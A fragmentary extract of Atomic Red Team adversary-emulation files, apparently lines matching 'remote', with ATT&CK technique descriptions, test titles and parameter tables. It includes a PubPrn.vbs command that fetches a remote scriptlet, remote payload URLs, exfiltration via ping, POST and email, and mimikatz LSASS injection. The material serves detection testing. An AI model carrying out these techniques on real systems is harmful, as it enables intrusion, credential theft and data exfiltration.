atomic-red-team	T1016.md	<blockquote>Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp, ipconfig/ifconfig, nbtstat, and route.	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	# T1018 - Remote System Discovery	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	<blockquote>Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as Ping or net view using Net. Adversaries may also use local host files (ex: C:\Windows\System32\Drivers\etc\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems.	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	- Atomic Test #1 - Remote System Discovery - net	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	- Atomic Test #2 - Remote System Discovery - net group Domain Computers	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	- Atomic Test #3 - Remote System Discovery - nltest	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	- Atomic Test #4 - Remote System Discovery - ping sweep	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	- Atomic Test #5 - Remote System Discovery - arp	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	- Atomic Test #6 - Remote System Discovery - arp nix	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	- Atomic Test #7 - Remote System Discovery - sweep	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	- Atomic Test #8 - Remote System Discovery - nslookup	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	- Atomic Test #9 - Remote System Discovery - adidnsdump	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	- Atomic Test #12 - Remote System Discovery - ip neighbour	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	- Atomic Test #13 - Remote System Discovery - ip route	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	- Atomic Test #14 - Remote System Discovery - ip tcp_metrics	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	## Atomic Test #1 - Remote System Discovery - net	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	Identify remote systems with net.exe.	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	## Atomic Test #2 - Remote System Discovery - net group Domain Computers	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	Identify remote systems with net.exe querying the Active Directory Domain Computers group.	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	## Atomic Test #3 - Remote System Discovery - nltest	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	## Atomic Test #4 - Remote System Discovery - ping sweep	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	Identify remote systems via ping sweep.	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	## Atomic Test #5 - Remote System Discovery - arp	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	Identify remote systems via arp.	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	## Atomic Test #6 - Remote System Discovery - arp nix	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	Identify remote systems via arp.	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	## Atomic Test #7 - Remote System Discovery - sweep	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	## Atomic Test #8 - Remote System Discovery - nslookup	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	## Atomic Test #9 - Remote System Discovery - adidnsdump	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	## Atomic Test #12 - Remote System Discovery - ip neighbour	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	## Atomic Test #13 - Remote System Discovery - ip route	MIT License. © 2018 Red Canary
atomic-red-team	T1018.md	## Atomic Test #14 - Remote System Discovery - ip tcp_metrics	MIT License. © 2018 Red Canary
atomic-red-team	T1021.001.md	# T1021.001 - Remote Desktop Protocol	MIT License. © 2018 Red Canary
atomic-red-team	T1021.001.md	<blockquote>Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.	MIT License. © 2018 Red Canary
atomic-red-team	T1021.001.md	Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)	MIT License. © 2018 Red Canary
atomic-red-team	T1021.001.md	Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the Accessibility Features technique for Persistence.(Citation: Alperovitch Malware)</blockquote>	MIT License. © 2018 Red Canary
atomic-red-team	T1021.001.md	Attempt an RDP session via Remote Desktop Application to a DomainController.	MIT License. © 2018 Red Canary
atomic-red-team	T1021.001.md	Attempt an RDP session via Remote Desktop Application over Powershell	MIT License. © 2018 Red Canary
atomic-red-team	T1021.001.md	Changing RDP Port to Non Standard Port via Remote Desktop Application over Powershell	MIT License. © 2018 Red Canary
atomic-red-team	T1021.002.md	<blockquote>Adversaries may use Valid Accounts to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.	MIT License. © 2018 Red Canary
atomic-red-team	T1021.002.md	Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMIN$, and IPC$. Adversaries may use this technique in conjunction with administrator-level Valid Accounts to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are Scheduled Task/Job, Service Execution, and Windows Management Instrumentation. Adversaries can also use NTLM hashes to access administrator shares on systems with Pass the Hash and certain configuration and patch levels.(Citation: Microsoft Admin Shares)</blockquote>	MIT License. © 2018 Red Canary
atomic-red-team	T1021.002.md	Connecting To Remote Shares	MIT License. © 2018 Red Canary
atomic-red-team	T1021.002.md	Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from https://docs.microsoft.com/en-us/sysinternals/downloads/psexec.	MIT License. © 2018 Red Canary
atomic-red-team	T1021.002.md	| remote_host | Remote computer to receive the copy and execute the file | String | \\localhost|	MIT License. © 2018 Red Canary
atomic-red-team	T1021.002.md	| output_file | Remote computer to receive the copy and execute the file | String | output.txt|	MIT License. © 2018 Red Canary
atomic-red-team	T1021.003.md	<blockquote>Adversaries may use Valid Accounts to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.	MIT License. © 2018 Red Canary
atomic-red-team	T1021.003.md	The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)	MIT License. © 2018 Red Canary
atomic-red-team	T1021.003.md	Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)	MIT License. © 2018 Red Canary
atomic-red-team	T1021.003.md	Upon successful execution, cmd will spawn calc.exe on a remote computer.	MIT License. © 2018 Red Canary
atomic-red-team	T1021.006.md	# T1021.006 - Windows Remote Management	MIT License. © 2018 Red Canary
atomic-red-team	T1021.006.md	<blockquote>Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.	MIT License. © 2018 Red Canary
atomic-red-team	T1021.006.md	WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the winrm command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014)</blockquote>	MIT License. © 2018 Red Canary
atomic-red-team	T1021.006.md	- Atomic Test #1 - Enable Windows Remote Management	MIT License. © 2018 Red Canary
atomic-red-team	T1021.006.md	## Atomic Test #1 - Enable Windows Remote Management	MIT License. © 2018 Red Canary
atomic-red-team	T1021.006.md	Upon successful execution, powershell will “Enable-PSRemoting” allowing for remote PS access.	MIT License. © 2018 Red Canary
atomic-red-team	T1021.006.md	Execute Invoke-command on remote host.	MIT License. © 2018 Red Canary
atomic-red-team	T1021.006.md	| host_name | Remote Windows Host Name | String | localhost|	MIT License. © 2018 Red Canary
atomic-red-team	T1021.006.md	| remote_command | Command to execute on remote Host | String | ipconfig|	MIT License. © 2018 Red Canary
atomic-red-team	T1021.006.md	An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled	MIT License. © 2018 Red Canary
atomic-red-team	T1021.006.md	| destination_address | Remote Host IP or Hostname | String | Target|	MIT License. © 2018 Red Canary
atomic-red-team	T1033.md	| computer_name | Name of remote computer | String | localhost|	MIT License. © 2018 Red Canary
atomic-red-team	T1046.md	<blockquote>Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system.	MIT License. © 2018 Red Canary
atomic-red-team	T1047.md	<blockquote>Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI)	MIT License. © 2018 Red Canary
atomic-red-team	T1047.md	An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)</blockquote>	MIT License. © 2018 Red Canary
atomic-red-team	T1047.md	- Atomic Test #4 - WMI Reconnaissance List Remote Services	MIT License. © 2018 Red Canary
atomic-red-team	T1047.md	- Atomic Test #6 - WMI Execute Remote Process	MIT License. © 2018 Red Canary
atomic-red-team	T1047.md	## Atomic Test #4 - WMI Reconnaissance List Remote Services	MIT License. © 2018 Red Canary
atomic-red-team	T1047.md	An adversary might use WMI to check if a certain Remote Service is running on a remote device.	MIT License. © 2018 Red Canary
atomic-red-team	T1047.md	if the provided remote host is unreacheable	MIT License. © 2018 Red Canary
atomic-red-team	T1047.md	## Atomic Test #6 - WMI Execute Remote Process	MIT License. © 2018 Red Canary
atomic-red-team	T1047.md	This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter.	MIT License. © 2018 Red Canary
atomic-red-team	T1047.md	This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter.	MIT License. © 2018 Red Canary
atomic-red-team	T1048.md	Remote to Local	MIT License. © 2018 Red Canary
atomic-red-team	T1048.md	Upon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) writing a tar.gz file.	MIT License. © 2018 Red Canary
atomic-red-team	T1048.md	Local to Remote	MIT License. © 2018 Red Canary
atomic-red-team	T1048.003.md	Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout.	MIT License. © 2018 Red Canary
atomic-red-team	T1048.003.md	Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout.	MIT License. © 2018 Red Canary
atomic-red-team	T1048.003.md	Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout.	MIT License. © 2018 Red Canary
atomic-red-team	T1049.md	<blockquote>Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.	MIT License. © 2018 Red Canary
atomic-red-team	T1053.001.md	An adversary may use at in Linux environments to execute programs at system startup or on a scheduled basis for persistence. at can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.</blockquote>	MIT License. © 2018 Red Canary
atomic-red-team	T1053.002.md	An adversary may use at.exe in Windows environments to execute programs at system startup or on a scheduled basis for persistence. at can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).	MIT License. © 2018 Red Canary
atomic-red-team	T1053.003.md	An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. cron can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.</blockquote>	MIT License. © 2018 Red Canary
atomic-red-team	T1053.005.md	An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).</blockquote>	MIT License. © 2018 Red Canary
atomic-red-team	T1053.005.md	- Atomic Test #3 - Scheduled task Remote	MIT License. © 2018 Red Canary
atomic-red-team	T1053.005.md	## Atomic Test #3 - Scheduled task Remote	MIT License. © 2018 Red Canary
atomic-red-team	T1053.005.md	Create a task on a remote system.	MIT License. © 2018 Red Canary
atomic-red-team	T1053.005.md	Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint.	MIT License. © 2018 Red Canary
atomic-red-team	T1055.md	- Atomic Test #2 - Remote Process Injection in LSASS via mimikatz	MIT License. © 2018 Red Canary
atomic-red-team	T1055.md	## Atomic Test #2 - Remote Process Injection in LSASS via mimikatz	MIT License. © 2018 Red Canary
atomic-red-team	T1055.md	It must be executed in the context of a user who is privileged on remote machine.	MIT License. © 2018 Red Canary
atomic-red-team	T1059.001.md	<blockquote>Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).	MIT License. © 2018 Red Canary
atomic-red-team	T1059.001.md	write-host “Remote download of SharpHound.ps1 into memory, followed by execution of the script” -ForegroundColor Cyan	MIT License. © 2018 Red Canary
atomic-red-team	T1059.001.md	Different obfuscated methods to test. Upon execution, reaches out to bit.ly/L3g1t and displays: “SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION”	MIT License. © 2018 Red Canary
atomic-red-team	T1059.001.md	Connect to a remote powershell session and interact with the host.	MIT License. © 2018 Red Canary
atomic-red-team	T1059.002.md	Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they’re already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute Native APIs, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team). Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via Python.(Citation: Macro Malware Targets Macs)</blockquote>	MIT License. © 2018 Red Canary
atomic-red-team	T1070.005.md	remote access to every disk volume on a network-connected system. These shares are automatically created at started unless they have been	MIT License. © 2018 Red Canary
atomic-red-team	T1070.005.md	remote access to every disk volume on a network-connected system. As Microsoft puts it, “Missing administrative shares typically	MIT License. © 2018 Red Canary
atomic-red-team	T1071.001.md	<blockquote>Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.	MIT License. © 2018 Red Canary
atomic-red-team	T1071.004.md	<blockquote>Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.	MIT License. © 2018 Red Canary
atomic-red-team	T1072.md	Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.	MIT License. © 2018 Red Canary
atomic-red-team	T1078.001.md	Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen Private Keys or credential materials to legitimately connect to remote environments via Remote Services.(Citation: Metasploit SSH Module)</blockquote>	MIT License. © 2018 Red Canary
atomic-red-team	T1078.001.md	After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,	MIT License. © 2018 Red Canary
atomic-red-team	T1078.001.md	| remote_desktop_users_group_name | Specify the remote desktop users group name | String | Remote Desktop Users|	MIT License. © 2018 Red Canary
atomic-red-team	T1078.003.md	<blockquote>Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.	MIT License. © 2018 Red Canary
atomic-red-team	T1078.004.md	<blockquote>Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)	MIT License. © 2018 Red Canary
atomic-red-team	T1087.002.md	| computer_name | Name of remote system to query | String | $env:COMPUTERNAME|	MIT License. © 2018 Red Canary
atomic-red-team	T1098.004.md	<blockquote>Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user’s home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config.	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	- Atomic Test #1 - rsync remote file copy (push)	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	- Atomic Test #2 - rsync remote file copy (pull)	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	- Atomic Test #3 - scp remote file copy (push)	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	- Atomic Test #4 - scp remote file copy (pull)	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	- Atomic Test #5 - sftp remote file copy (push)	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	- Atomic Test #6 - sftp remote file copy (pull)	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	## Atomic Test #1 - rsync remote file copy (push)	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	Utilize rsync to perform a remote file copy (push)	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	| remote_path | Remote path to receive rsync | Path | /tmp/victim-files|	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	| remote_host | Remote host to copy toward | String | victim-host|	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	| username | User account to authenticate on remote host | String | victim|	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	## Atomic Test #2 - rsync remote file copy (pull)	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	Utilize rsync to perform a remote file copy (pull)	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	| remote_host | Remote host to copy from | String | adversary-host|	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	| username | User account to authenticate on remote host | String | adversary|	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	## Atomic Test #3 - scp remote file copy (push)	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	Utilize scp to perform a remote file copy (push)	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	| remote_path | Remote path to receive scp | Path | /tmp/victim-files/|	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	## Atomic Test #4 - scp remote file copy (pull)	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	Utilize scp to perform a remote file copy (pull)	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	## Atomic Test #5 - sftp remote file copy (push)	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	Utilize sftp to perform a remote file copy (push)	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	| remote_path | Remote path to receive sftp | Path | /tmp/victim-files/|	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	## Atomic Test #6 - sftp remote file copy (pull)	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	Utilize sftp to perform a remote file copy (pull)	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	| destination_path | Path to create remote file at. Default is local admin share. | String | \\localhost\C$|	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	Download a remote file using the whois utility	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	| remote_host | Remote hostname or IP address | String | localhost|	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	| remote_port | Remote port to connect to | Integer | 8443|	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	| query | Query to send to remote server | String | Hello from Atomic Red Team test T1105|	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	The following Atomic utilizes native curl.exe, or downloads it if not installed, to download a remote DLL and output to a number of directories to simulate malicious behavior.	MIT License. © 2018 Red Canary
atomic-red-team	T1105.md	| remote_destination | Remote destination | String | www.example.com|	MIT License. © 2018 Red Canary
atomic-red-team	T1112.md	Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility Reg may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.	MIT License. © 2018 Red Canary
atomic-red-team	T1112.md	The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often Valid Accounts are required, along with access to the remote system’s SMB/Windows Admin Shares for RPC communication.</blockquote>	MIT License. © 2018 Red Canary
atomic-red-team	T1112.md	<li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>	MIT License. © 2018 Red Canary
atomic-red-team	T1113.md	<blockquote>Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as CopyFromScreen, xwd, or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)	MIT License. © 2018 Red Canary
atomic-red-team	T1119.md	<blockquote>Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a Command and Scripting Interpreter to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools.	MIT License. © 2018 Red Canary
atomic-red-team	T1124.md	<blockquote>An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service)	MIT License. © 2018 Red Canary
atomic-red-team	T1124.md	System time information may be gathered in a number of ways, such as with Net on Windows by performing net time \\hostname to gather the system time on a remote system. The victim’s time zone may also be inferred from the current system time or gathered by using w32tm /tz. (Citation: Technet Windows Time Service)	MIT License. © 2018 Red Canary
atomic-red-team	T1133.md	# T1133 - External Remote Services	MIT License. © 2018 Red Canary
atomic-red-team	T1133.md	<blockquote>Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as Windows Remote Management can also be used externally.	MIT License. © 2018 Red Canary
atomic-red-team	T1133.md	Access to Valid Accounts to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.	MIT License. © 2018 Red Canary
atomic-red-team	T1135.md	<blockquote>Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.	MIT License. © 2018 Red Canary
atomic-red-team	T1135.md	File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) Net can be used to query a remote system for available shared drives using the net view \\\\remotesystem command. It can also be used to query shared drives on the local system using net share.</blockquote>	MIT License. © 2018 Red Canary
atomic-red-team	T1136.001.md	<blockquote>Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the net user /add command can be used to create a local account.	MIT License. © 2018 Red Canary
atomic-red-team	T1136.001.md	Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.</blockquote>	MIT License. © 2018 Red Canary
atomic-red-team	T1136.002.md	Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.</blockquote>	MIT License. © 2018 Red Canary
atomic-red-team	T1136.003.md	<blockquote>Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)	MIT License. © 2018 Red Canary
atomic-red-team	T1137.004.md	| url | URL to Outlook Home Page containing the payload to execute (can be local file:// or remote https://) | String | file://PathToAtomicsFolder\T1137.004\src\T1137.004.html|	MIT License. © 2018 Red Canary
atomic-red-team	T1140.md	One such example is use of certutil to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)	MIT License. © 2018 Red Canary
atomic-red-team	T1187.md	The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.	MIT License. © 2018 Red Canary
atomic-red-team	T1187.md	* A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. Template Injection). The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)	MIT License. © 2018 Red Canary
atomic-red-team	T1187.md	* A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\[remote address]\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)</blockquote>	MIT License. © 2018 Red Canary
atomic-red-team	T1187.md	This module runs the Windows executable of PetitPotam in order to coerce authentication for a remote system.	MIT License. © 2018 Red Canary
atomic-red-team	T1197.md	| remote_file | Remote file to download | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md|	MIT License. © 2018 Red Canary
atomic-red-team	T1216.001.md	PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png.</blockquote>	MIT License. © 2018 Red Canary
atomic-red-team	T1216.001.md	| remote_payload | A remote payload to execute using PubPrn.vbs. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216.001/src/T1216.001.sct|	MIT License. © 2018 Red Canary
atomic-red-team	T1218.001.md	- Atomic Test #2 - Compiled HTML Help Remote Payload	MIT License. © 2018 Red Canary
atomic-red-team	T1218.001.md	## Atomic Test #2 - Compiled HTML Help Remote Payload	MIT License. © 2018 Red Canary
atomic-red-team	T1218.001.md	Uses hh.exe to execute a remote compiled HTML Help payload.	MIT License. © 2018 Red Canary
atomic-red-team	T1218.001.md	| remote_chm_file | Remote .chm payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm|	MIT License. © 2018 Red Canary
atomic-red-team	T1218.003.md	<blockquote>Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.	MIT License. © 2018 Red Canary
atomic-red-team	T1218.003.md	Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to Regsvr32 / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.	MIT License. © 2018 Red Canary
atomic-red-team	T1218.003.md	- Atomic Test #1 - CMSTP Executing Remote Scriptlet	MIT License. © 2018 Red Canary
